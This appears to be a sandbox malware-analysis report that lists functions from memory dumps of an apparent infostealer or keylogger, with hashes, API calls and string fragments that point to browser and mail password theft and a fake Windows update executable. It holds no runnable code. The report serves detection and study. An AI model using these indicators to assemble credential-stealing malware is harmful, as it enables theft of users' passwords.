                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E06616, Relevance: 1.5, APIs: 1, Instructions: 42windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • PostMessageW.USER32(?,?,?,?), ref: 04E06651
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: MessagePost
                                                                      • String ID:
                                                                      • API String ID: 410705778-0
                                                                      • Opcode ID: 20267bb6ba7963989a6c3b2c1f6be794aedb64dc2cb8b56d687ac7b8653b3a66
                                                                      • Instruction ID: 9d73e07e196841fcf4240469d85b28bbed4272f1980b96594482ab1bf3df2e5e
                                                                      • Opcode Fuzzy Hash: 20267bb6ba7963989a6c3b2c1f6be794aedb64dc2cb8b56d687ac7b8653b3a66
                                                                      • Instruction Fuzzy Hash: F001D431500604DFDB208F25E844B66FFA0EF08320F08C4AEDD494B751D271E468DF61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E02E5E, Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • KiUserCallbackDispatcher.NTDLL(?,?,EE35994E,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 04E02E93
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CallbackDispatcherUser
                                                                      • String ID:
                                                                      • API String ID: 2492992576-0
                                                                      • Opcode ID: 5fca3528baa712f7cc385af27fee51d82ace62a8a69e880f99a44511a47084dc
                                                                      • Instruction ID: 5a841176a89678f92c4eaca91e0648a69e7bcf72f50b5426158215dc62ee9aa5
                                                                      • Opcode Fuzzy Hash: 5fca3528baa712f7cc385af27fee51d82ace62a8a69e880f99a44511a47084dc
                                                                      • Instruction Fuzzy Hash: EA01A235500644DFD7118F59D888756FFE4EF04320F18D0AADE494B792D275B849DB72
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E02FBE, Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FindClose.KERNEL32(?,EE35994E,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 04E02FF0
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CloseFind
                                                                      • String ID:
                                                                      • API String ID: 1863332320-0
                                                                      • Opcode ID: 723de66dcf174fe34c5a8211aee9c930cad539cc38fab6e819e5e0236822168d
                                                                      • Instruction ID: 5cd5c718271e8dad4efcb3c823254fe1a4bfe1442d4c421ddf08c2feaa6810c7
                                                                      • Opcode Fuzzy Hash: 723de66dcf174fe34c5a8211aee9c930cad539cc38fab6e819e5e0236822168d
                                                                      • Instruction Fuzzy Hash: AC01D135600644DFDB108F19D884766FFD4EF04320F08D0AADE099B796D6B5E848DB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E06576, Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • KiUserCallbackDispatcher.NTDLL(?,EE35994E,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 04E065A8
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CallbackDispatcherUser
                                                                      • String ID:
                                                                      • API String ID: 2492992576-0
                                                                      • Opcode ID: 3e07a217b31027934d5c95c31a14cc6fa6b7ce1f27aa2d931c4c49029e096bfe
                                                                      • Instruction ID: d0a7e3566a9f33e359138c870e50fda45059fb11e50a5ae70e66c52c50c50ffa
                                                                      • Opcode Fuzzy Hash: 3e07a217b31027934d5c95c31a14cc6fa6b7ce1f27aa2d931c4c49029e096bfe
                                                                      • Instruction Fuzzy Hash: 29012131A00604CFCB208F29D884752FFA4EF14220F08D0AADD4A8B386D6B0E458CB72
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E02A22, Relevance: 1.5, APIs: 1, Instructions: 38windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(?,?,?,?), ref: 04E02A5D
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID:
                                                                      • API String ID: 3850602802-0
                                                                      • Opcode ID: 8138360d1d9c6fb1f3169f6e2be26b2826f3febd537c3c9b3a8bb8926fcad108
                                                                      • Instruction ID: 749ba5b61efbeae90fb87489d098ae8f7094540d81db7f176d50ff7ca520ed95
                                                                      • Opcode Fuzzy Hash: 8138360d1d9c6fb1f3169f6e2be26b2826f3febd537c3c9b3a8bb8926fcad108
                                                                      • Instruction Fuzzy Hash: 84018B31500644DFDB208F55D888B66FFE0EF08320F08D09ADE990B352D6B5A858DBA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E06836, Relevance: 1.5, APIs: 1, Instructions: 35windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DispatchMessageW.USER32(?), ref: 04E06868
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: DispatchMessage
                                                                      • String ID:
                                                                      • API String ID: 2061451462-0
                                                                      • Opcode ID: f9ad6ba674b26db647c1192ab59680f2d9988712a8a2e88e3b006f4b2b789468
                                                                      • Instruction ID: bb760001db4472f7c9d7c334f1a1c8757bc6e5cbf4188a464fa3e3203e4ac284
                                                                      • Opcode Fuzzy Hash: f9ad6ba674b26db647c1192ab59680f2d9988712a8a2e88e3b006f4b2b789468
                                                                      • Instruction Fuzzy Hash: 65F0AF34904644DFDB208F25D885762FFA4EF04320F18D09ADD495F352D2B5B558DAB2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00CD43BF, Relevance: .6, Instructions: 566COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.311981748.0000000000CD4000.00000040.00000040.sdmp, Offset: 00CD4000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 66572be4d4fe86657e674e98ced36dc45ac4e96e23f654889e83a028bb7eba5f
                                                                      • Instruction ID: 9b7f947620aad3d7c1fcef4beab804ddc51ddd77582da2354c776ba24ad8b776
                                                                      • Opcode Fuzzy Hash: 66572be4d4fe86657e674e98ced36dc45ac4e96e23f654889e83a028bb7eba5f
                                                                      • Instruction Fuzzy Hash: BF41E33554E3C09FC3078B3098A1A51BFB0AF47214F1E81DBD584CF2A3C229990ADB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 08501EC8, Relevance: .1, Instructions: 60COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.314137456.0000000008500000.00000040.00000001.sdmp, Offset: 08500000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7ad62f125ff175d04df463ca3d665e36bbe4b0c15ffc963d2d40b4488c39b1ff
                                                                      • Instruction ID: 62ccbf729d6d6cb9876cc93ecc9a561d85f7751103b86e106ef698a5c85c12cc
                                                                      • Opcode Fuzzy Hash: 7ad62f125ff175d04df463ca3d665e36bbe4b0c15ffc963d2d40b4488c39b1ff
                                                                      • Instruction Fuzzy Hash: 3E11BAB5508301AFD340CF19D880A5BFBE4FB8C664F14896EF998D7311E271EA048FA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00CD075C, Relevance: .1, Instructions: 59COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.311967758.0000000000CD0000.00000040.00000040.sdmp, Offset: 00CD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 39e0dcfa3aa3ad50bf5b1ed0a6addd23acc91ff652c93ff19f6b0fc19839ced7
                                                                      • Instruction ID: 941d22dfc0425c16a4ef662a8ef9fba7a1593a4f33aeed650297bc7ed3dafb49
                                                                      • Opcode Fuzzy Hash: 39e0dcfa3aa3ad50bf5b1ed0a6addd23acc91ff652c93ff19f6b0fc19839ced7
                                                                      • Instruction Fuzzy Hash: 4B11A234204244EFD715CB28C984B26BB95AB88708F34C5AEEA491B793C777E803DE51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00CD47FC, Relevance: .1, Instructions: 58COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.311981748.0000000000CD4000.00000040.00000040.sdmp, Offset: 00CD4000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2a793826526fd600a8b20557789d59322b9537799205f3c2c922971235afd55e
                                                                      • Instruction ID: f7ed2844fba595ba080956c5c05dcb1d8d9a69b5b5cb0e46c1b97df8f3884bed
                                                                      • Opcode Fuzzy Hash: 2a793826526fd600a8b20557789d59322b9537799205f3c2c922971235afd55e
                                                                      • Instruction Fuzzy Hash: E211D3302043C0DFD719DB14D980B26BB95AB94708F28C5AEEB499B782C77BC803DA51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00CD0707, Relevance: .1, Instructions: 55COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.311967758.0000000000CD0000.00000040.00000040.sdmp, Offset: 00CD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2e44789835691d82ee7e9d437cad0f7636c71dd6a375dcf72a394733833db718
                                                                      • Instruction ID: 188e59006be03013105f4967fb7c82c319f9100c80976abcbb7e56198c54e5ef
                                                                      • Opcode Fuzzy Hash: 2e44789835691d82ee7e9d437cad0f7636c71dd6a375dcf72a394733833db718
                                                                      • Instruction Fuzzy Hash: 98214A3410D3C09FC7038B20C854B55BFB1AB47304F2A85DFD9899F6A3C23A9806DB52
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00CD072C, Relevance: .1, Instructions: 55COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.311967758.0000000000CD0000.00000040.00000040.sdmp, Offset: 00CD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b1ce9a51b580787b5b2a818d772d4b5d1f40a118a01be1563b6ea5a8bf057327
                                                                      • Instruction ID: c33af0f51217711127df217d5642ae7cee0121d7fa8ce08cba27b5d2f0bec81e
                                                                      • Opcode Fuzzy Hash: b1ce9a51b580787b5b2a818d772d4b5d1f40a118a01be1563b6ea5a8bf057327
                                                                      • Instruction Fuzzy Hash: CA216D355097C49FC706CB24C890B15BFB1AB46308F2986DFD9889B6A3C33AD906DB52
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 08501D6C, Relevance: .1, Instructions: 52COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.314137456.0000000008500000.00000040.00000001.sdmp, Offset: 08500000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 16da589f44f7c983628e1dd7d76a36349101190f672bddadae704f1628bb0f53
                                                                      • Instruction ID: b5a2e6d05c082e3c27240241bf42c4c965c21f6a1a7f9f6f80cb4cf3bc42fc30
                                                                      • Opcode Fuzzy Hash: 16da589f44f7c983628e1dd7d76a36349101190f672bddadae704f1628bb0f53
                                                                      • Instruction Fuzzy Hash: 1511FEB5508305AFD350CF49DC80E57FBE8EB88660F14891EFD5997311D271E9048FA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00CAB060, Relevance: .1, Instructions: 52COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.311863165.0000000000CA2000.00000040.00000001.sdmp, Offset: 00CA2000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1e5f1f735ff2989b5edc08dbee6150f3c231303b8309be9a9fa8e2ce85c7f383
                                                                      • Instruction ID: c47c3520f3fbf90e0399e94f733bab9ecb5db0e46c2644ad316aee4e9d0217c7
                                                                      • Opcode Fuzzy Hash: 1e5f1f735ff2989b5edc08dbee6150f3c231303b8309be9a9fa8e2ce85c7f383
                                                                      • Instruction Fuzzy Hash: 4311ECB5508305AFD350CF49DC40E57FBE9EB88660F14891EFD5897311D271E9048BA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00CD05D0, Relevance: .0, Instructions: 45COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.311967758.0000000000CD0000.00000040.00000040.sdmp, Offset: 00CD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b4104ac0dd5b1819c5a3f127a4819ef741c12e02d7f5063eace5ed1789884afd
                                                                      • Instruction ID: 1b80df3430ccdabe8c167ffbd95671cdc5da45d8c8ec465ea64925a2ff64d644
                                                                      • Opcode Fuzzy Hash: b4104ac0dd5b1819c5a3f127a4819ef741c12e02d7f5063eace5ed1789884afd
                                                                      • Instruction Fuzzy Hash: 8801DB755087809FC7018F06EC40897FFE8EF4623070981AFED898B312D235B549CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00CD0818, Relevance: .0, Instructions: 31COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.311967758.0000000000CD0000.00000040.00000040.sdmp, Offset: 00CD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 525cef522958239b2deb72ab7ac90410e2832b06fb356f1b7ca8807ee3c9392c
                                                                      • Instruction ID: d7c6cfba7d7bbe6b1e7562275ac225a5be85a7fb0de090697feed7691c81305b
                                                                      • Opcode Fuzzy Hash: 525cef522958239b2deb72ab7ac90410e2832b06fb356f1b7ca8807ee3c9392c
                                                                      • Instruction Fuzzy Hash: BCF01D35104644DFC305DF44D940B15FBA2EB89718F24C6ADE9590B752C337E913DE81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00CD48B4, Relevance: .0, Instructions: 30COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.311981748.0000000000CD4000.00000040.00000040.sdmp, Offset: 00CD4000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 95f1d1c0ab60764af12a70ef74b4e893d14d7dc88e7bfbb80b028a97c38b0015
                                                                      • Instruction ID: 2ab582c89427e9ada395a827b924e5f895a80caef4708353ad7d5dd76293aa88
                                                                      • Opcode Fuzzy Hash: 95f1d1c0ab60764af12a70ef74b4e893d14d7dc88e7bfbb80b028a97c38b0015
                                                                      • Instruction Fuzzy Hash: D9F03C35248684DFC305CF00D980B25FBA2FB99718F24C6AEEA480B752C3379813DA81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00CD05F6, Relevance: .0, Instructions: 27COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.311967758.0000000000CD0000.00000040.00000040.sdmp, Offset: 00CD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 24bc421b0e805ec5e700e239b8b68779d19e545aa44b3308f15c089be1d881fc
                                                                      • Instruction ID: 42fbddc4f16aa19460116fa06ef64d91f251f1ba06aa52868ff4d221c25d67ad
                                                                      • Opcode Fuzzy Hash: 24bc421b0e805ec5e700e239b8b68779d19e545aa44b3308f15c089be1d881fc
                                                                      • Instruction Fuzzy Hash: EBE092766046048BD650CF0BEC41852F7D8EB88630B18C07FDC0D8B700E135B508CEA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 08501F33, Relevance: .0, Instructions: 26COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.314137456.0000000008500000.00000040.00000001.sdmp, Offset: 08500000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 02ab801ab63523498401fa2ec8f160760ba333278aa45c0081dc2c8a2f9f9490
                                                                      • Instruction ID: fb7f82aa872b6fff62b940e6346a9c28862eb66e583413f6e2af6949b6d1ae53
                                                                      • Opcode Fuzzy Hash: 02ab801ab63523498401fa2ec8f160760ba333278aa45c0081dc2c8a2f9f9490
                                                                      • Instruction Fuzzy Hash: DFE0D8B2540704A7D2108E0A9C41F53FB9CEB44A30F14C46BEE0C1B302E171B5148AE1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 085017DF, Relevance: .0, Instructions: 26COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.314137456.0000000008500000.00000040.00000001.sdmp, Offset: 08500000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 74874acedd8d30546b1e525f8089c741f455469ee38af2f6088ab5453120a7e6
                                                                      • Instruction ID: d83fcdad88efec8c741ecc1ea489fb1c68656226e86352fd000da0201ac24e4f
                                                                      • Opcode Fuzzy Hash: 74874acedd8d30546b1e525f8089c741f455469ee38af2f6088ab5453120a7e6
                                                                      • Instruction Fuzzy Hash: 6AE0D872500604A7D2109E0A9C41F53FB98EB44A30F18C45BEE0C1B301E172B514CAE1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 08501DBB, Relevance: .0, Instructions: 26COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.314137456.0000000008500000.00000040.00000001.sdmp, Offset: 08500000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b68538e3ed71790fce78c2785ed425384fd5b0cb12376d02e725ab35e1dd821d
                                                                      • Instruction ID: c51f22341190043302cc5f798332f2cbdc22e6e43885968da610fab311f01e64
                                                                      • Opcode Fuzzy Hash: b68538e3ed71790fce78c2785ed425384fd5b0cb12376d02e725ab35e1dd821d
                                                                      • Instruction Fuzzy Hash: FDE0D872500704A7D2509E4A9C81F63FB98EB44A30F14C45BEE0D5B302E172B5048AF1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00CAB0AF, Relevance: .0, Instructions: 26COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.311863165.0000000000CA2000.00000040.00000001.sdmp, Offset: 00CA2000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 840f4a1d284715ce36e59fe1379bb58a13eec6761cf5635eb71a8fad13ac2d47
                                                                      • Instruction ID: 077dbcb0b5676ab38c4a0d44639b2ec7310ec69710a33677baa1467518ca4a6c
                                                                      • Opcode Fuzzy Hash: 840f4a1d284715ce36e59fe1379bb58a13eec6761cf5635eb71a8fad13ac2d47
                                                                      • Instruction Fuzzy Hash: A1E0D8B2540204A7D2108E4A9C41F53FB58EB44A30F14C55BEE0C1B301E171B5048AF1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Function 004123BD, Relevance: 11.5, Strings: 9, Instructions: 252COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, Offset: 003D0000, based on PE: true
                                                                      • Associated: 00000008.00000002.310750620.00000000003D0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000008.00000002.311001167.0000000000450000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000008.00000002.311041936.000000000046B000.00000002.00020000.sdmp Download File
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 111$186$IT2$This is an email notifying you that $ctrl]$irefox\Profiles$ogger$owsUpdate.exe$tRegistry.blob
                                                                      • API String ID: 0-2878782224
                                                                      • Opcode ID: 500860e728286adb18c0bf13f487f037efe4476fcd1a14ae2a0040675c86e4c6
                                                                      • Instruction ID: 4718d20ce191bb87b5313d9e871eca2fd44353dbbb105e0579fe0510f2ff7c39
                                                                      • Opcode Fuzzy Hash: 500860e728286adb18c0bf13f487f037efe4476fcd1a14ae2a0040675c86e4c6
                                                                      • Instruction Fuzzy Hash: 7A8104366003059FDB14DE69CA91BABB3E1AB98314F24402FF559DB3C1DEB8EC458B18
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 003FF7A0, Relevance: 9.1, Strings: 7, Instructions: 393COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, Offset: 003D0000, based on PE: true
                                                                      • Associated: 00000008.00000002.310750620.00000000003D0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000008.00000002.311001167.0000000000450000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000008.00000002.311041936.000000000046B000.00000002.00020000.sdmp Download File
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$Version$atform$broswers$d$geType$sion
                                                                      • API String ID: 0-3555804936
                                                                      • Opcode ID: 4f46880ec85f88801a554e00cbfcc2f9e0213d776c414bb9eab6518b7bb1fa05
                                                                      • Instruction ID: c1a75783e1ecc54945f2d1e580c5b2832dd9181bda1ea3bc3d4e2af22dfb19d2
                                                                      • Opcode Fuzzy Hash: 4f46880ec85f88801a554e00cbfcc2f9e0213d776c414bb9eab6518b7bb1fa05
                                                                      • Instruction Fuzzy Hash: 39F19A3190020ADFDF26CF59C481ABEB7B1AF44314F25816AED19AB291D770ED91CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 003E7848, Relevance: 8.9, Strings: 7, Instructions: 124COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, Offset: 003D0000, based on PE: true
                                                                      • Associated: 00000008.00000002.310750620.00000000003D0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000008.00000002.311001167.0000000000450000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000008.00000002.311041936.000000000046B000.00000002.00020000.sdmp Download File
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: MainForm$deAttribute$downMode$nExit$oughAttribute$t_MainForm$utdownStyle
                                                                      • API String ID: 0-2660833595
                                                                      • Opcode ID: af6cae2161f7bc56c8f813624d03bda84462ff09a7564d267a9ae88ccefe7e29
                                                                      • Instruction ID: c6b35e6260a399e2b61013bee15c381ecb83fc4a0a5b4aaf9e66bc909bf1b62e
                                                                      • Opcode Fuzzy Hash: af6cae2161f7bc56c8f813624d03bda84462ff09a7564d267a9ae88ccefe7e29
                                                                      • Instruction Fuzzy Hash: 4041C272540318ABEB219F61DC89A9AB7F8FF18704F20096EF185D3181EB759A84CB48
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004064B0, Relevance: 7.7, Strings: 6, Instructions: 234COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, Offset: 003D0000, based on PE: true
                                                                      • Associated: 00000008.00000002.310750620.00000000003D0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000008.00000002.311001167.0000000000450000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000008.00000002.311041936.000000000046B000.00000002.00020000.sdmp Download File
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: .Configuration$etObject$mailpv$moryExecute$owserPassView$tingsBase
                                                                      • API String ID: 0-749029414
                                                                      • Opcode ID: baa6644cc2a69e35bd7fd9a59dfaf54ebb7c7025a90ce4ada3156637178e7f82
                                                                      • Instruction ID: 0e2bf8afb4ab7fd309c747104b47c4e3f062ef17483e1dbbcb6c22f02e385e91
                                                                      • Opcode Fuzzy Hash: baa6644cc2a69e35bd7fd9a59dfaf54ebb7c7025a90ce4ada3156637178e7f82
                                                                      • Instruction Fuzzy Hash: E2919E71900209AFDF11DFA5C841BAE7BB5EF04318F15417AE902BB396D739AD508F94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00406932, Relevance: 7.7, Strings: 6, Instructions: 173COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, Offset: 003D0000, based on PE: true
                                                                      • Associated: 00000008.00000002.310750620.00000000003D0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000008.00000002.311001167.0000000000450000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000008.00000002.311041936.000000000046B000.00000002.00020000.sdmp Download File
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: _SaveMySettingsOnExit$cLockOnValueType$cretKey$efault$ettingsBase$tart
                                                                      • API String ID: 0-21323432
                                                                      • Opcode ID: 6e9ce7506f77b83500ef16ba2fa1e402de0e0b461f87fff3fbb5ef98cb4cae80
                                                                      • Instruction ID: 0d707ab0e8920de01ee2598323ee62faef3f14b59f4b0db8021502ee1c2e8c89
                                                                      • Opcode Fuzzy Hash: 6e9ce7506f77b83500ef16ba2fa1e402de0e0b461f87fff3fbb5ef98cb4cae80
                                                                      • Instruction Fuzzy Hash: 8651C371A00208ABDF11AF95CC41A9FBBB1EF48314F15406AF946772C2D779AE61CF89
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 003EB4BA, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 327COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, Offset: 003D0000, based on PE: true
                                                                      • Associated: 00000008.00000002.310750620.00000000003D0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000008.00000002.311001167.0000000000450000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000008.00000002.311041936.000000000046B000.00000002.00020000.sdmp Download File
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: __aulldvrm$__aullrem
                                                                      • String ID: +
                                                                      • API String ID: 643879872-2126386893
                                                                      • Opcode ID: 0d7612511857791f632887a230211975cfd4e8a3c881828d6afa5ce276b5977e
                                                                      • Instruction ID: 2bae232a29e6c97fc1de23d11de00ba47468f7527b2e3215b93144ae7ed201db
                                                                      • Opcode Fuzzy Hash: 0d7612511857791f632887a230211975cfd4e8a3c881828d6afa5ce276b5977e
                                                                      • Instruction Fuzzy Hash: C3C182715093E18ED723CF2A858536BFFE0AF96304F194A5DE4C49A292D374CA49CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 003FC473, Relevance: 6.5, Strings: 5, Instructions: 279COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, Offset: 003D0000, based on PE: true
                                                                      • Associated: 00000008.00000002.310750620.00000000003D0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000008.00000002.311001167.0000000000450000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000008.00000002.311041936.000000000046B000.00000002.00020000.sdmp Download File
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Install$ValueKind$alogResult$ectoryInfo$nput
                                                                      • API String ID: 0-1121157722
                                                                      • Opcode ID: 4712c125cfb1917e48a508b8f1d65a880b5012809e4287fe9dffd245ac3c31a2
                                                                      • Instruction ID: 288c3187eed09ea7143e88a07d873692268b9bae18ca28897e3008247ac75909
                                                                      • Opcode Fuzzy Hash: 4712c125cfb1917e48a508b8f1d65a880b5012809e4287fe9dffd245ac3c31a2
                                                                      • Instruction Fuzzy Hash: DCC19D71944259DFEB26DF64C980BA9B7B0FF04310F1984EAE90DAB252D731AD84CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00406258, Relevance: 6.4, Strings: 5, Instructions: 200COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
